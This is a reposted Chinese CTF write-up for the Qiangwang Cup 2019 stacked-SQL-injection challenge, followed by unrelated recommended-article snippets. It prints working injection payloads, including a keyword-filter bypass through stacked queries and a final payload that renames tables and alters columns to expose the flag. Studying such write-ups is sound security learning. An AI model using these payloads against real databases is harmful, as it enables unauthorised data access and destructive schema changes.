首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-04-20 14:36:59
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
花馍魚的做法
花馍魚的做法
花馍魚的做法?紫薯面底座揉面團,我來為大家講解一下關于花馍魚的做法?跟着小編一起來看一看吧!花馍魚的做法紫薯面底座。揉面團。把面團揉成圓球。搓成一頭尖的面團。三分之一捏一下。壓扁成魚尾,并用梳子壓出魚尾花紋。剪三刀魚尾。用鑷子捏出魚脊背。做...
2026-04-20
用什麼解酒最好
用什麼解酒最好
用什麼解酒最好?什麼東西解酒最快最好:蜂蜜水:适量飲用有助于緩解酒後頭痛的症狀,因為蜂蜜中含有果糖,可以促進酒精分解吸收,也可選擇糖水,酸奶,純牛奶,都可以加快酒精代謝,今天小編就來聊一聊關于用什麼解酒最好?接下來我們就一起去研究一下吧!用...
2026-04-20
工商不合格羽絨服
工商不合格羽絨服
工商不合格羽絨服?這兩天,來自韓國的衣戀集團再次成為了不少人的關注焦點,但與多年前“韓流”席卷是“求而不得的夢中情衣”“9億少女的夢”等稱号不同,如今令其登上熱搜的,卻是#标價1500的羽絨服成本隻有75#這樣的負面話題,今天小編就來說說關...
2026-04-20
毒雞湯是不是沒完沒了
毒雞湯是不是沒完沒了
全民發聲的時代,網絡上的“雞湯”可謂是百花齊放,應有盡有。從養生到創業、從戀愛到愛國……總有一款能精準地戳中讀者的心。而“僞雞湯”“毒雞湯”屢次反轉,消費大衆感情的事件也時有發生——“僞雞湯”盛行,誰來管管?楊藍姚雯/漫畫“這本來是一趟很普...
2026-04-20
木本繡球養殖方法
木本繡球養殖方法
木本繡球養殖方法?木繡球一般都是通過壓條,分株以及扡插等方法來進行繁殖分株法的話,一般比較适合在初春時植株萌發之前進行,把已經生根的枝條和母樹分開來繁殖壓條的話在在春天可以用高空壓條的方法,一般會在六七月份生根,在當年就可以分割和分栽了,楚...
2026-04-20
Copyright 2023-2026 - www.tftnews.com All Rights Reserved